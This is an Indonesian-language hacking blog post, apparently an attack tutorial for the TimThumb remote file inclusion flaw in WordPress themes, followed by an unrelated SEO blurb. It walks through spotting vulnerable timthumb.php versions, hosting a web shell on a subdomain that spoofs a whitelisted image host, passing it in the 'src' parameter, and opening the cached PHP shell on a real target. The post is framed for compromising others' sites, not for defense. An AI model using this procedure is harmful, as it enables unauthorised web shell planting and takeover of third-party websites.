Okeh sebelum belajar exploit ini saya mau ngejelasin bahwa timthumb ini adalah suatu bug dimana terdapat di semua website wordpress , lebih tepatnya terdapat pada " theme / tema " suatu website ,,,
Contoh : themes/optimizepress/timthumb.php < nah kalo ada bacaan seperti "

 
no image specified
Query String :
TimThumb version : 1.19 
 
berarti vuln ;) ,, nah yang harus kamu ketahui lagi itu adalah TimThumb version . 
Nah jadi target yang bisa kita exploitasi itu timthumb version 1.14 sampai dengan 
1.32 ,, Udah ngerti kan ? :) kalo belum ngerti liat aja tutorialnya :) ,, Yuk TKP .. 
 
Alat dan Bahan : 
1. Subdomain yang terintegrasi website berikut 
   : picasa.com
   : blogger.com
   : flixr.com 
 
sebenarnya ada 5 tapi aku gk hafal U,u ,, contoh " flxr.com.namawebsitekamu.com/shell.php "
, Nah sebelumnya kamu musti upload dulu shell di subdomain kamu yang letaknya di directory
public_html / httpdocs / www / dan macam² .. 
  
2. Otak dan pantang menyerah ;) .. 

Exploit : 
1. Kali ini saya dah punya target sendiri ,, lihat gambar .. 
2. Nah kemudian kalian tambahkan subdomain kalian di ahkir url seperti ini " ?src=http://www.flixr.com.subdomainkamu.com/shell.php " < begitu mas ;) ,, kurang jelas ? lihat gambar .. 
3. Tuh liat gambarnya kalo gitu dah " Game Over " namanya ;) .. tinggal buka shellnya aja kan di situ ada tulisan " Unable to open image :" kalo gitu skrng tinggal buka shellnya , caranya copy md5 yang tadi contoh :

" /cache/c89de71219ef668b7642e43e04d5d4df.php " masih kurang jelas ? liat gambar ..
4. Nah skrng kita copas ke urlnya jadi " http://namatarget.com/wp-content/themes/optimizepress/cache/c89de71219ef668b7642e43e04d5d4df.php "  , lihat di bawah ,,

5. Selesai deh :D ,,, nah itu kalo ane gk upload shell di subdomainnya tapi upload uploader aja jadi ky gitu ,,
hehe sory yak uploadernya punya pak deb~X ,,

Source : Extreme Crew
Axact

BELAJAR SEO

SEO adalah singkatan dari "search engine optimization" (pengoptimalan mesin telusur) atau "search engine optimizer". Penggunaan jasa SEO adalah keputusan besar yang dapat meningkatkan peringkat situs Anda dan menghemat waktu, tapi juga berisiko tinggi terhadap situs dan reputasi.H.COM

Post A Comment:

0 comments: